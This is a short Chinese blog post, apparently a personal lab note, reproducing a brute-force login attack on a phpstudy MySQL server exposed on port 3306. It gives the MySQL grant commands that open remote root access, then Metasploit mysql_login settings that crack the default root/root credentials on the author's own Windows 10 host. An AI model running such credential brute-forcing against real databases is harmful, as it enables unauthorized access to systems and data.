关于phpstudy开启3306远程管理数据库的复现

发布于:2023-01-02 ⋅ 阅读:(547) ⋅ 点赞:(0)

前言:

个人笔记,希望能帮助大家,一起交流

环境准备:

攻击机:kali

win10中下载phpstudy 并且打开了3306端口远程管理数据库

如何启动phpstudy中数据库远程管理端口3306请参考 

https://blog.csdn.net/qq_45089570/article/details/104569254

phpstudy->右下角<其他选项菜单>  -> Mysql工具  ->Mysql命令行

Enter password: ****  //初始用户名和密码都是root

mysql> use mysql;  //使用Mysql

mysql> grant all privileges on *.* to  // 授予所有特权

-> root@'%' identified by 'root';

mysql> flush privileges;

开始攻击

打开Msfconsole

use auxiliary/scanner/mysql/mysql_login

 show options  //查看此模块儿的选项

设置参数:
set RHOST 192.168.18.150 (这是我windows10 的ip地址)
set user_file 用户名字典的路径(位置)
set pass_file 密码字典的路径(位置)
set STOP_ON_SUCCESS yes (只要爆破成功就停止)

run 启动攻击,开始爆破

爆破成功 user(root)password(root)   

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布